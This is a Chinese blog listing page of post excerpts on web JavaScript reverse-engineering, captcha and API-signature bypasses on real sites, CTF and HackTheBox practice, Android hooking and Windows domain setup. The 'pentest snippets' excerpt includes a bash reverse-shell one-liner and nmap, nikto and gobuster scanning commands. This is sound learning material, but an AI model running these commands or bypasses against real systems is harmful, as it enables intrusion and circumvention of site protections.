- 博客(31)
- 收藏
- 关注

原创 某易某盾js分析
时间:2025.03.19版本:其中通过python调用node对轨迹点进行加密的函数时,通过在url添加随机数动态加载js:使用浏览器override功能将加载处代码重写使用代理软件进行文件替换。
2025-03-19 17:54:44
976
原创 oklink js逆向(入口定位)
结合搜索结果,搜索关键字 apikey(,只找到5个。可见使用了字符串混淆,所以搜索不到 x-apikey。还可以通过搜索 headers,追踪调用栈的方式定位。分析api请求,定位参数 X-Apikey。搜索关键字apikey,发现结果太多。
2025-04-07 19:30:50
153
原创 丁香园-搜索功能
定位网络请求,分析请求参数,主要有 noncestr sign 要分析。noncestr 定义如下,生成长度为8的随机字符串。搜索罕见关键字 noncestr。AI分析可知知是SHA1哈希算法。sign 的计算如下。
2025-04-07 10:36:31
234
原创 医保服务平台 Webpack逆向
function o 是常见的webpack加载器格式,之后一大堆类似 o.e = xxx 的赋值语句。之后的 o(xxx) 函数大概率是检测环境的函数,注释后即可免去补环境。分析可知 u=n("7d92") 其中 u.a 为加密函数 u.b 为解密函数。SM4 为国密算法,其中e.data 为响应。发现数据被加密,搜索关键字。类似的,使用关键字搜索,定位请求加密处。在每个拦截器的尾部断点,确定解密位置。其中 loader.js,直接复制。扣代码,删除环境检测函数。
2025-03-27 17:19:28
447
原创 猿人学js逆向 - 16
r.m = n[e(528)](btoa, p_s), 等价于直接将时间戳作为参数运行 btoa函数,btoa被重写不是base64加密。三个参数:page、token、时间戳,时间戳和page直接获得,token需要扣代码。其中 n.g 这个值需要赋值,浏览器代码中它是有值的,这里要手动赋值。补完环境扣完代码后运行总是出错,响应token错误。md5函数中也存在字符串混淆,且被重排序。
2025-03-26 18:11:31
196
原创 猿人学js逆向 - 19
上网搜索发现此题考点是环境监测,注释掉headers后依旧成功获取答案,怀疑是题目环境出现问题。没有复杂参数,直接复制curl转换python发送请求。但此题开启转包软件后服务端不会返回正常答案。
2025-03-26 11:24:59
712
原创 猿人学js逆向 - 15
分析请求,发现每个get请求带一个token。window.q 是一个wasm函数。使用 wasmer 库调用。函数名为encode。
2025-03-26 10:46:09
866
原创 猿人学js逆向 - 03
之后发现必须使用 requests 的 Session 对象,并且在设置headers和Cookie时也要注意。将两个请求复制为curl格式,转为python后发送,得到一串html文本。第一个代码来自 jQuery 的 hook 函数。发现每次点击都是发送两个请求。反复请求无法发现之间的关系。将其注释后发现请求回失败。
2025-03-25 17:41:26
783
原创 猿人学js逆向 - 01
使用 hook 定位 window.f,发现是 oo0O0 函数中的 eval() 函数中的VM中执行的。eval 执行的内容是将base64编码后的代码解码并替换其中的参数为时间变量 0x2268f9。打开f12遇到一个定时器无限debugger,使用条件断点去除。注意token中的分割符号不是普通空格,可直接复制编码后的值。分析发现token来自ajax方法的b参数。进入 VM 中,代码被混淆。
2025-03-19 22:32:26
232
原创 某道翻译接口js分析
每次翻译的请求如下,3个xhr为一组/webtranslate/key 的请求与响应/webtranslate 的请求与响应分析可知,主要的变化参数为 sing 和 时间戳mysticTime追踪栈请求发送处向上查找,发现sign在params参数中,向下追踪调用栈在栈中找到sign其中除时间戳外都为固定值。
2025-03-16 16:46:28
230
原创 HackTheBox - Chemistry
获得shell后查看相关信息。home目录下存在用于 rosa,切换到用户,查看flag。当前python网站的sqlite数据库中有数据。上传文件在线解析,可猜测到是文件解析漏洞。反弹shell的脚本。
2025-03-13 20:46:25
228
原创 scrape_center appbasic
使用 jadx-gui 进行java层静态分析,IDA进行so层静态分析,jeb动态调试,frida注入。
2025-03-10 16:07:10
129
原创 安卓逆向这档事-52pojie
汉化:文本可能在代码中或xml文件中,可能的位置:Arsc、xml、dex文件。解压apk文件,从lib目录中提取so文件。frida-ps -U // 查看进程PID。使用MT管理器、NP管理器修改包名实现共存。一些加密方法,用于Xposed练习。确认报名和Activity名。使用 frida Hook。
2025-03-08 21:13:15
1365
原创 渗透-常用片段
反弹 bash:bash -i >& /dev/tcp/192.168.56.109/444 0>&1nmap -sn 192.168.56.1/24nmap -p- -A -sV 192.168.56.xnikto -h http://xxgobuster dir --url 192.168.56.128 --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt -x php,txt,html,js,php.bak,txt.bak,htm
2025-02-12 11:22:33
146
原创 scrape.center spa6
列表页apiapi的url如下:https://spa6.scrape.center/api/movie/?其中 token base64解码得到:f4624250e650ff80769f37cdc5ef1c7dbea73532,1739153205 且此token存在时间限制详情页api:https://spa6.scrape.center/detail/ZWYzNCN0ZXVxMGJ0dWEjKC01N3cxcTVvNS0takA5OHh5Z2ltbHlmeHMqLSFpLTAtbWIx。
2025-02-11 09:59:21
729
原创 scrape.center spa2
其中token为js动态生成。通过网络请求查看网络请求js。点击进入token生成函数。其中d对象为xhr对象。发现token的构造。打断点,点击进入函数。
2025-01-25 10:22:47
233
原创 windows server 2003 - 组策略部署软件
通过组策略为域内用户部署(deploy)软件,可分为指派(assign)和发布(publish)。
2023-05-30 10:30:12
395
1
原创 windows2003-建立域
活动目录是一个包括文件、打印机、应用程序、服务器、域、用户账户等对象的数据库。常见概念:对象、属性、容器abc.com\业务部\业务一组\张三。
2023-05-27 21:34:19
614
1
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人